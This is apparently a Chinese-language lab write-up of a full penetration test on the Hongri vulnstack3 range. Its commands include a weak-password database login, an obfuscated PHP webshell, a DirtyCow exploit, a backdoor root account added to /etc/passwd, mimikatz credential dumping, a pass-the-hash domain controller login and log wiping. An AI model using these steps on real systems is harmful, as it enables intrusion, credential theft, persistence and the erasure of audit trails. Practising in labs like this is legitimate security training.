1. 环境搭建与初始信息收集
红日靶场的vulnstack3环境模拟了一个典型的企业内网架构,包含外网Web服务器和内网域环境。启动虚拟机后,我发现目标IP为10.50.128.107,通过nmap快速扫描发现开放了80端口:
nmap -sS -T4 10.50.128.107扫描结果显示运行着Joomla CMS系统。用Wappalyzer插件确认版本为3.4.5,这个版本存在已知漏洞。我习惯先用dirb扫描目录结构:
dirb http://10.50.128.107 /usr/share/wordlists/dirb/common.txt发现了/administrator后台入口,这是Joomla的典型特征。同时发现phpinfo页面暴露了服务器配置信息,包括禁用的危险函数列表,这对后续的webshell绕过很有参考价值。
2. Joomla漏洞利用实战
2.1 数据库弱口令突破
在phpinfo页面发现MySQL配置信息,尝试用默认密码root/root连接成功:
mysql -h 10.50.128.107 -u root -p通过HeidiSQL图形化工具查看joomla数据库,在am2zu_users表发现管理员密码哈希。使用john破解:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt但耗时太长,我选择直接修改数据库。Joomla密码采用md5(password:salt)格式,可以用已知值替换:
UPDATE am2zu_users SET password='d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199' WHERE username='admin';2.2 后台getshell技巧
登录后台后,在模板编辑处插入PHP代码是最直接的方式。但遇到两个问题:
- 禁用函数导致命令执行失败
- 杀毒软件拦截常规webshell
我采用混淆免杀马:
<?php $f=chr(99).chr(97).chr(116); $c=$f." /etc/passwd"; system($c); ?>通过templates/beez3目录上传,成功绕过检测。但执行命令返回127错误,需要绕过disable_functions限制。
3. 内网穿透与权限提升
3.1 突破网络隔离
执行ifconfig发现服务器有双网卡:
- eth0: 10.50.128.107 (外网)
- eth1: 192.168.93.120 (内网)
上传fscan进行内网探测:
./fscan -h 192.168.93.0/24发现三台主机:
- 192.168.93.10 (域控)
- 192.168.93.20 (成员服务器)
- 192.168.93.30 (Win7客户端)
3.2 权限维持技巧
通过DirtyCow漏洞提权到root:
gcc -pthread dirty.c -o dirty -lcrypt ./dirty mypassword然后添加SSH后门账号:
echo "backup:\$1\$backup\$v5D04WU1JXJNjJjhXUj/v.:0:0:backup:/root:/bin/bash" >> /etc/passwd4. 横向移动攻防实战
4.1 SMB协议利用
发现192.168.93.20开放445端口,用smbmap枚举共享:
smbmap -H 192.168.93.20 -u 'guest' -p ''发现可写共享,上传恶意lnk文件实现横向移动。
4.2 域控攻陷过程
使用bloodhound分析域环境:
Invoke-BloodHound -CollectionMethod All -Domain test.local -ZipFileName bh.zip发现域管理员曾登录过192.168.93.30。通过mimikatz抓取内存凭证:
sekurlsa::logonpasswords最终用psexec.py登录域控:
psexec.py administrator@192.168.93.10 -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d45. 痕迹清理与防御建议
完成渗透后,需要清理日志:
# Linux系统 echo "" > /var/log/auth.log # Windows系统 wevtutil cl security wevtutil cl system防御方面建议:
- Joomla及时更新补丁
- 数据库禁止外网访问
- 网络分层隔离
- 禁用不必要的协议和服务
- 部署EDR监控异常行为
整个渗透过程耗时约6小时,最关键的是发现Joomla数据库弱口令这个突破口。内网横向移动时,耐心和信息收集往往比技术更重要。
)
